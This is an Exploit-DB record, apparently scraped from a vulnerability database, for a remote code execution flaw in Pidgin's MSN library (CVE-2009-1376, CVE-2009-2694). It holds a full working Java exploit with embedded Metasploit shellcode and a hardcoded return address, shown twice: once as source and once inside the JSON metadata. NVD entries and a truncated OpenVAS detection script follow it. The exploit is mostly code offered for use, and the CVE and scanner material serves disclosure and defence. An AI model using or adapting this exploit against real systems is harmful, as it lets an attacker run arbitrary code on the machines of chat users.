ID EDB-ID:9615 Type exploitdb Reporter Pierre Nogues Modified 2009-09-09T00:00:00
Description
Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform
/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
* which could lead to memory corruption.
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
* Windows, Linux, Mac
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
* javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
* java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
public class PidginExploit {
private MsnMessenger messenger;
private String login;
private String password;
private String target;
private int session_id = NumberUtils.getIntRandom();
private byte shellcode[] = new byte[] {
/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};
// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8
private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;
public static void main(String[] args) throws Exception {
if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}
}
public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;
neweip = reteip - shellcode.length ;
for(int i=0;i<shellcode.length;i++)
payload[i] = shellcode[i];
payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}
public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);
initMessenger(messenger);
messenger.login();
}
protected void initMessenger(MsnMessenger messenger) {
messenger.addContactListListener(new MsnContactListAdapter() {
public void contactListInitCompleted(MsnMessenger messenger) {
final Object id = new Object();
messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
public void switchboardStarted(MsnSwitchboard switchboard) {
if (id != switchboard.getAttachment())
return;
switchboard.inviteContact(Email.parseStr(target));
}
public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;
MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);
// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);
msg.setP2PDest(target);
switchboard.sendMessage(msg);
System.out.println("First packet sent, waiting for the ACK");
}
public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}
public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});
messenger.addMessageListener(new MsnMessageAdapter(){
public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {
//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();
MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);
switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");
}
});
messenger.addMessengerListener(new MsnMessengerAdapter() {
public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}
public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}
public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});
}
}
// milw0rm.com [2009-09-09]
{"id": "EDB-ID:9615", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "description": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform", "published": "2009-09-09T00:00:00", "modified": "2009-09-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9615/", "reporter": "Pierre Nogues", "references": [], "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2016-02-01T10:59:54", "viewCount": 12, "enchantments": {"score": {"value": 9.8, "vector": "NONE", "modified": "2016-02-01T10:59:54", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2694", "CVE-2009-1376"]}, {"type": "openvas", "idList": ["OPENVAS:66109", "OPENVAS:136141256231064727", "OPENVAS:136141256231064718", "OPENVAS:136141256231066109", "OPENVAS:64711", "OPENVAS:136141256231064784", "OPENVAS:136141256231064753", "OPENVAS:64753", "OPENVAS:64784", "OPENVAS:64789"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21963", "SECURITYVULNS:DOC:22344", "SECURITYVULNS:DOC:22463", "SECURITYVULNS:VULN:10165", "SECURITYVULNS:VULN:9250"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1870-1:14B64"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2009-1218.NASL", "CENTOS_RHSA-2009-1060.NASL", "CENTOS_RHSA-2009-1218.NASL", "SL_20090818_PIDGIN_ON_SL3_X.NASL", "DEBIAN_DSA-1870.NASL", "ORACLELINUX_ELSA-2009-1218.NASL", "ORACLELINUX_ELSA-2009-1060.NASL", "GENTOO_GLSA-200910-02.NASL", "FEDORA_2009-8826.NASL", "REDHAT-RHSA-2009-1060.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200910-02"]}, {"type": "zdi", "idList": ["ZDI-09-031"]}, {"type": "fedora", "idList": ["FEDORA:0922810F888", "FEDORA:0BBD210F88B", "FEDORA:BEBF010F882", "FEDORA:DF27810F882", "FEDORA:0F46A10F89C", "FEDORA:0213210F80B", "FEDORA:1A97710F881"]}, {"type": "seebug", "idList": ["SSV:12249", "SSV:12092", "SSV:66870"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F73EA20BBECA556E930239128D9B66B0"]}, {"type": "redhat", "idList": ["RHSA-2009:1218", "RHSA-2009:1059"]}, {"type": "cert", "idList": ["VU:582244"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:81096"]}, {"type": "slackware", "idList": ["SSA-2009-231-02"]}, {"type": "ubuntu", "idList": ["USN-820-1", "USN-781-2"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1218", "ELSA-2009-1059"]}, {"type": "freebsd", "idList": ["59E7AF2D-8DB7-11DE-883B-001E3300A30D"]}, {"type": "centos", "idList": ["CESA-2009:1218", "CESA-2009:1059"]}], "modified": "2016-02-01T10:59:54", "rev": 2}, "vulnersScore": 9.8}, "sourceHref": "https://www.exploit-db.com/download/9615/", "sourceData": "/*\n* Pidgin MSN <= 2.5.8 Remote Code Execution\n*\n* Pierre Nogues - pierz@hotmail.it\n* http://www.indahax.com/\n*\n*\n* Description:\n* Pidgin is a multi-protocol Instant Messenger.\n*\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets\n* which could lead to memory corruption.\n*\n* Affected versions :\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\n*\n* Plateforms :\n* Windows, Linux, Mac\n*\n* Fix :\n* Fixed in Pidgin 2.5.9\n* Update to the latest version : http://www.pidgin.im/download/\n*\n* References :\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\n* [3] http://www.pidgin.im/news/security/?id=34\n*\n* Usage :\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java\n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\n*\n*/\n\nimport net.sf.jml.*;\nimport net.sf.jml.event.*;\nimport net.sf.jml.impl.*;\nimport net.sf.jml.message.p2p.*;\nimport net.sf.jml.util.*;\n\npublic class PidginExploit {\n\n private MsnMessenger messenger;\n private String login;\n private String password;\n private String target;\n\n private int session_id = NumberUtils.getIntRandom();\n\n private byte shellcode[] = new byte[] {\n\n /*\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\n * sub esp,500\n */\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\n\n\n /*\n * windows/exec - 121 bytes\n * http://www.metasploit.com\n * EXITFUNC=process, CMD=calc.exe\n */\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\n (byte) 0x00\n };\n\n // reteip = pointer to the return address in the stack\n // The shellcode will be wrote just before reteip\n // and reteip will automaticly point to the shellcode. It's magic !\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\n\n private int neweip;\n private byte[] payload = new byte[shellcode.length + 4];\n private int totallength = reteip + 4;\n\n public static void main(String[] args) throws Exception {\n\n if(args.length != 3){\n System.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\");\n }else{\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\n exploit.start();\n }\n\n }\n\n public PidginExploit(String login, String password, String target){\n this.login = login;\n this.password = password;\n this.target = target;\n\n neweip = reteip - shellcode.length ;\n\n for(int i=0;i<shellcode.length;i++)\n payload[i] = shellcode[i];\n\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\n }\n\n public void start() {\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\n\n messenger.setLogIncoming(false);\n messenger.setLogOutgoing(false);\n\n initMessenger(messenger);\n messenger.login();\n }\n\n protected void initMessenger(MsnMessenger messenger) {\n\n messenger.addContactListListener(new MsnContactListAdapter() {\n\n public void contactListInitCompleted(MsnMessenger messenger) {\n\n final Object id = new Object();\n\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\n\n public void switchboardStarted(MsnSwitchboard switchboard) {\n\n if (id != switchboard.getAttachment())\n return;\n\n switchboard.inviteContact(Email.parseStr(target));\n }\n\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\n if (id != switchboard.getAttachment())\n return;\n\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\n msg.setIdentifier(NumberUtils.getIntRandom());\n msg.setSessionId(session_id);\n msg.setOffset(0);\n msg.setTotalLength(totallength);\n msg.setCurrentLength(totallength);\n\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\n // We'll use this buffer to rewrite memory in the stack\n msg.setFlag(0x1000020);\n\n msg.setP2PDest(target);\n\n switchboard.sendMessage(msg);\n\n System.out.println(\"First packet sent, waiting for the ACK\");\n\n }\n\n public void switchboardClosed(MsnSwitchboard switchboard) {\n System.out.println(\"switchboardClosed\");\n switchboard.getMessenger().removeSwitchboardListener(this);\n }\n\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\n System.out.println(\"contactLeaveSwitchboard\");\n }\n });\n messenger.newSwitchboard(id);\n }\n });\n\n messenger.addMessageListener(new MsnMessageAdapter(){\n\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\n\n //We receive the ACK of our first packet with the ID of the new bogus packet\n message.getIdentifier();\n\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\n payload.length, payload, target);\n\n switchboard.sendMessage(msg);\n System.out.println(\"ACK received && Payload sent !\");\n System.out.println(\"Exploit OK ! CTRL+C to quit\");\n\n }\n });\n\n\n\n messenger.addMessengerListener(new MsnMessengerAdapter() {\n\n public void loginCompleted(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" login\");\n }\n\n public void logout(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" logout\");\n }\n\n public void exceptionCaught(MsnMessenger messenger,\n Throwable throwable) {\n System.out.println(\"caught exception: \" + throwable);\n }\n });\n\n }\n}\n\n// milw0rm.com [2009-09-09]\n", "osvdbidlist": ["54647"], "immutableFields": []}
{"cve": [{"lastseen": "2021-04-21T20:47:47", "description": "Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim) before 2.5.6 on 32-bit platforms allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, leading to buffer overflows. NOTE: this issue exists because of an incomplete fix for CVE-2008-2927.", "edition": 7, "cvss3": {}, "published": "2009-05-26T15:30:00", "title": "CVE-2009-1376", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1376"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.0"], "id": "CVE-2009-1376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1376", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.1:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.4:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.2:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.0:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.3:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.2:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.3:32_bit:*:*:*:*:*:*"]}, {"lastseen": "2021-04-21T20:47:51", "description": "The msn_slplink_process_msg function in libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by sending multiple crafted SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary memory location. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1376.", "edition": 7, "cvss3": {}, "published": "2009-08-21T11:02:00", "title": "CVE-2009-2694", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2694"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:adium:adium:1.3.1", "cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:adium:adium:1.3.4", "cpe:/a:adium:adium:1.3.3", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:adium:adium:1.2.7", "cpe:/a:adium:adium:1.3.5", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:adium:adium:1.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:adium:adium:1.3.2", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2009-2694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.3.1:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2018-04-06T11:37:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064784", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064784", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "sourceData": "#\n#VID 59e7af2d-8db7-11de-883b-001e3300a30d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 59e7af2d-8db7-11de-883b-001e3300a30d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pidgin\n libpurple\n finch\n\nCVE-2009-2694\nThe msn_slplink_process_msg function in\nlibpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin\n(formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows\nremote attackers to execute arbitrary code or cause a denial of\nservice (memory corruption and application crash) by sending multiple\ncrafted SLP (aka MSNSLP) messages to trigger an overwrite of an\narbitrary memory location. NOTE: this issue reportedly exists because\nof an incomplete fix for CVE-2009-1376.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/36384/\nhttp://www.pidgin.im/news/security/?id=34\nhttp://www.vuxml.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64784\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: pidgin, libpurple, finch\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : 